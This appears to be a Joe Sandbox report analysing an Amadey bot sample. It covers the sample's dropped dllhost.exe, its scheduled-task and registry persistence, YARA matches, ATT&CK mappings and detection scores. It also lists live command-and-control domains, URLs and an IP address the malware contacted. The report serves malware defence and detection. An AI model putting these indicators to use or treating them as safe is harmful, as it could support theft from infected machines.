              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00411091 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00411091
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00401F40 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,0_2_00401F40
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_0041F3E4 _free,GetTimeZoneInformation,0_2_0041F3E4
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004048B0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_004048B0

              Stealing of Sensitive Information

              barindex
              Yara detected Amadey bot
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTR
              Yara detected Amadeys stealer DLL
              Source: Yara matchFile source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
              Command and Scripting Interpreter              		1
              Scheduled Task/Job              		211
              Process Injection              		1
              Modify Registry              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		21
              Virtualization/Sandbox Evasion              		LSASS Memory231
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API              		1
              DLL Side-Loading              		1
              Registry Run Keys / Startup Folder              		211
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		NTDS11
              Application Window Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564918 Sample: S7AGd447vH.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 36 web.xmlpost.xyz 2->36 38 web.jsonpost.xyz 2->38 48 Multi AV Scanner detection for domain / URL 2->48 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 56 13 other signatures 2->56 9 S7AGd447vH.exe 4 2->9         started        13 dllhost.exe 2->13         started        15 dllhost.exe 2->15         started        signatures3 54 Performs DNS queries to domains with low reputation 38->54 process4 file5 32 C:\Users\user\AppData\Local\...\dllhost.exe, PE32 9->32 dropped 60 Detected unpacking (changes PE section rights) 9->60 62 Detected unpacking (overwrites its own PE header) 9->62 64 Contains functionality to inject code into remote processes 9->64 17 dllhost.exe 56 9->17         started        66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->66 signatures6 process7 dnsIp8 34 web.jsonpost.xyz 72.52.178.23, 49730, 49731, 49732 LIQUIDWEBUS United States 17->34 40 Antivirus detection for dropped file 17->40 42 System process connects to network (likely due to code injection or exploit) 17->42 44 Multi AV Scanner detection for dropped file 17->44 46 4 other signatures 17->46 21 cmd.exe 1 17->21         started        23 schtasks.exe 1 17->23         started        signatures9 process10 process11 25 reg.exe 1 21->25         started        28 conhost.exe 21->28         started        30 conhost.exe 23->30         started        signatures12 58 Creates an undocumented autostart registry key 25->58

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              S7AGd447vH.exe66%ReversingLabsWin32.Trojan.Generic
              S7AGd447vH.exe69%VirustotalBrowse
              S7AGd447vH.exe100%AviraTR/Fraud.Gen8
              S7AGd447vH.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe100%AviraTR/Fraud.Gen8
              C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe66%ReversingLabsWin32.Trojan.Generic

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://web.xmlpo0%Avira URL Cloudsafe
              http://web.xQ0%Avira URL Cloudsafe
              web.jsonpost.xyz/sj2vMs/index.php100%Avira URL Cloudphishing
              http://web.xmlpost.x0%Avira URL Cloudsafe
              web.xmlpost.xyz/sj2vMs/index.php100%Avira URL Cloudphishing
              web.xmlpost.xyz/sj2vMs/index.php0%VirustotalBrowse
              web.jsonpost.xyz/sj2vMs/index.php10%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              web.jsonpost.xyz
              		72.52.178.23
              		truefalse
                		high
                web.xmlpost.xyz
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://web.jsonpost.xyz/false
                    		high
                    web.xmlpost.xyz/sj2vMs/index.phptrue
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://web.jsonpost.xyz/sj2vMs/index.phpfalse
                      		high
                      http://web.jsonpost.xyz/sj2vMs/index.php?scr=1false
                        		high
                        web.jsonpost.xyz/sj2vMs/index.phptrue
                        • 10%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEdllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://web.xmlpost.xyz/sj2vMs/index.phpC:dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://web.xmlpost.xyz/sj2vMs/index.phpDdllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://web.xmlpost.xyz/sj2vMs/index.phpCdllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://web.xmlpost.xyz/sj2vMs/index.php:dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://web.jsonpost.xyz/sj2vMs/index.php?scr=1#dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://web.xmlpost.xyz/sj2vMs/index.phpgWdllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://web.xmlpost.xyz/sj2vMs/inldllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://web.jsonpost.xyz/sj2vMs/index.phpdeddllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://web.jsonpost.xyz/sj2vMs/index.phpQdllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://web.xmlpost.xyz/sj2vMs/index.php/dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://web.xmlpost.xyz/sj2vMs/index.phpvdllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://web.xmlpost.xyz/sj2vMs/index.php)dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://web.xmlpost.xyz/sj2vMs/index.php(dllhost.exe, 00000001.00000003.1775452885.00000000008C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://web.xmlpost.xyz/sj2vMs/index.phpgdllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://web.jsonpost.xyz/sj2vMs/index.phpncodeddllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg3ydllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://web.jsonpost.xyz/sj2vMs/index.php?scr=1REdllhost.exe, 00000001.00000003.1986578008.0000000000912000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://web.xQdllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://web.xmlpodllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEetCookiesW3dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://web.jsonpost.xyz/sj2vMs/index.php#dllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://web.xmlpost.xyz/sj2vMs/index.phpdllhost.exe, 00000001.00000003.1871896347.000000000090A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://web.jsonpost.xyz/sj2vMs/index.phpncodedYdllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://web.xmlpost.xyz/sj2vMs/index.php?scr=16Hdllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://web.xmlpost.xyz/sj2vMs/index.phpRdllhost.exe, 00000001.00000003.1833860453.00000000008F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEsdllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://web.jsonpost.xyz/sj2vMs/index.php?scr=1Gdllhost.exe, 00000001.00000003.1833879370.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://web.xmlpost.xdllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817713247.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://web.xmlpost.xyz/sj2vMs/index.php?scr=1dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg4ydllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                72.52.178.23
                                                                                		web.jsonpost.xyzUnited States
                                                                                		32244LIQUIDWEBUSfalse

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1564918
                                                                                Start date and time:2024-11-29 01:51:04 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 35s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:13
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:S7AGd447vH.exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:5F5C1A5DF77079F56EB5A61D19666728.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@13/2@18/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 71
                                                                                • Number of non-executed functions: 100
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target dllhost.exe, PID 7608 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                00:52:04Task SchedulerRun new task: dllhost.exe path: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                19:52:02API Interceptor75111x Sleep call for process: dllhost.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                72.52.178.23http://ok.clicknowvip.comGet hashmaliciousUnknownBrowse
                                                                                • ok.clicknowvip.com/page/bouncy.php?&bpae=GbhGd6c6okx%2Fj3OE4HtYIA68CX9ntwpoDg8E5j%2F4dndljne37pKkD5CpSoioxJaypSWFN%2B%2F7d0pdJjT%2FXeAaZtK52aNdDQePqFw%2BU3EtFy8HVw1CurFHa9v1SNkwpEvnt6kapzzY0jmrtiBi%2Fs0p6Hg1%2BWybmADL5b%2FeGqxaUo%2B3ZgqC1TD15ONDM9JCdp0IuM2%2F0ahg0EaD%2B3knPKHcpKzBm7rSKjhlh7dhj2PtSd9vXMAEGyg4Pdl4F9WFOCMl66J4OK%2FdlD4%2BJGBkAIUa4c04kq%2BFeoq%2FA6%2BDbxRArOdXle6ANZXCYNYN4VzpUDKqHkNwNdhyHvjL72y%2Fvg1F7wOrPTIlFWMmR%2FUJVZi%2FtHCN2VT7pp%2F4kFPLl%2Fsqa62NdgRS%2FlX0MozXYx6%2FHCam5PersGjq21a7r7kzBfCWTg%3D%3D&redirectType=js&inIframe=false&inPopUp=false
                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                • wxgzshna.biz/qjhbu
                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                • wxgzshna.biz/jubq
                                                                                AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                • wxgzshna.biz/klxaypeiwoubq
                                                                                SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                • wxgzshna.biz/pmqdwnqfxl
                                                                                AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                • wxgzshna.biz/exoigpwxtw
                                                                                PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                • wxgzshna.biz/rilnx
                                                                                nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                • wxgzshna.biz/rltuqai
